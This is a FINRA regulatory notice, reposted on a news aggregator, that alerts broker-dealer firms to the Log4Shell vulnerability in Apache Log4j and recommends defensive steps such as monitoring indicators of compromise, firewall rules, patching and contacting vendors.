Aggregated News From Investment Management Regulators

FINRA Alerts Firms to “Log4Shell” Vulnerability in Apache Log4j Software


Please complete the required fields.


FINRA is alerting firms to a recently identified vulnerability in Apache Log4J software, which is an open-source, Java-based logging utility widely used by enterprise applications and cloud services. The “Log4Shell” vulnerability presents risk for member firms because they may be using this software in internal applications, or the software may be embedded in third-party software packages. In addition, many applications written in Java are potentially vulnerable.

Bad actors may take advantage of this vulnerability to compromise systems to potentially steal information or engage in fraudulent activities. For example, a remote attacker can exploit this vulnerability to take control of an affected system.

FINRA reminds firms that the U. S. Securities and Exchange Commission’s (SEC) Regulation S-P Rule 30 requires firms to have written policies and procedures that are reasonably designed to safeguard customer records and information and FINRA Rule 4370 (Business Continuity Plans and Emergency Contact Information) also applies to denials of service and other interruptions to members’ operations. In addition to firms’ compliance with SEC regulations, FINRA expects firms to develop reasonably designed cybersecurity programs and controls that are consistent with their risk profile, business model and scale of operations.

For more information, firms should review the resources provided on FINRA’s Cybersecurity Topic Page.

Next Steps

FINRA recommends member firms consider engaging their Technology staff along with third-party vendors, including any IT service providers, and taking the following steps:

  1. Leverage indicators of compromise (IOCs) associated with the vulnerability and take the following steps:
    1. Monitor network and server activity to identify attempts to exploit the vulnerability including industry provided IOCs.
    2. Review historical log data including past network and server activity to identify IOCs that would indicate a bad actor has exploited the vulnerability in your environment.
    3. If the IOCs are confirmed in your environment, consider implementing your incident response plan and handling this as a high-risk cybersecurity incident.
    4. If applicable, respond and recover from the intrusion following the steps in your incident response plan.
  2. Consider evaluating firm (and, if applicable, vendors’) firewalls to address additional risks relating to the vulnerability:
    1. Evaluate firewall rules for outbound traffic and consider adding rule(s) to block traffic to suspicious or unknown locations (e.g., outbound egress filtering).
    2. Confirm that any internet-facing application systems using Apache Log4J are protected by a web application firewall to provide protection against traffic that includes signatures known to be malicious.
  3. Review firms’ internally maintained application systems to determine if any are at risk from the vulnerability:
    1. Conduct an inventory of all internal systems to identify any that are using the Apache Log4J vulnerable code.
    2. For the systems identified, either apply the security patch for Apache Log4J or upgrade to the latest version of the software that includes the fix (Apache Log4J 2.15 or later).
    3. Test the updated software before releasing into your production environment.
    4. Confirm that the updated Apache Log4j software is applied to all devices that use the software.
  4. Evaluate third-party vendors’ systems to determine whether they have been impacted by the vulnerability:
    1. Contact your software application vendors and ask them if any of their systems contain the vulnerable Apache Log4j software. For example, vendors such as CiscoVMware, and Red Hat have issued advisories about potentially vulnerable products.
    2. If so, ask vendors how they plan to update their system to address the vulnerability.
    3. Receive and test the updated software from vendors before releasing into your production environment.
    4. Confirm that the updated Apache Log4j software is applied to all devices that use the software.
  5. Continue monitoring threat information and updates through multiple intelligence sources including, but not limited to:
    1. Cybersecurity and Infrastructure Security Agency (CISA);
    2. FS-ISAC; and
    3. Your preferred threat intelligence sources, including any third-party security systems or tools providers.

Questions regarding this Notice should be directed to:

  • Dave Kelley, Director, Member Supervision Specialist Programs, at (816) 802-4729 or by email; or
  • Greg Markovich, Senior Principal Risk Specialist, Member Supervision Specialist Programs, at (312) 899-4604 or by email.

Additional Resources

This news item was originally published by the Financial Industry Regulatory Authority (FINRA US). For more information, see the Source Link.

Regulator Information

Abbreviation: FINRA
Jurisdiction: United States

Recent Articles

Grand Trust Holdings United Kingdom

We believe this firm may be providing financial services or products in the UK without our authorisation. Find out why you should be wary...

Announcement for the referral of a suspicion of violating Article (49) of the Capital Market Law and Article (2) of the Market Conduct Regulations...

In line with the Capital Market Authority's (CMA) responsibilities to protect the citizens and investors from unfair or unsound practices, and aiming to achieve...

Guidance on Application for Registration of a Virtual Assets Service Provider

Guidance Attachment: guidance_-_application_for_vasp_registration.pdf This news item was originally published by the British Virgin Islands Financial Services Commission (BVIFSC VG). For more information, please see the Source Link.

Virtual Assets Service Providers Guide to the Prevention of Money Laundering, Terrorist Financing and Proliferation Financing

Guidance Attachment: vasp_aml_cft_guidance.pdf This news item was originally published by the British Virgin Islands Financial Services Commission (BVIFSC VG). For more information, please see the Source...

Get the latest from Regulatory.News in your inbox!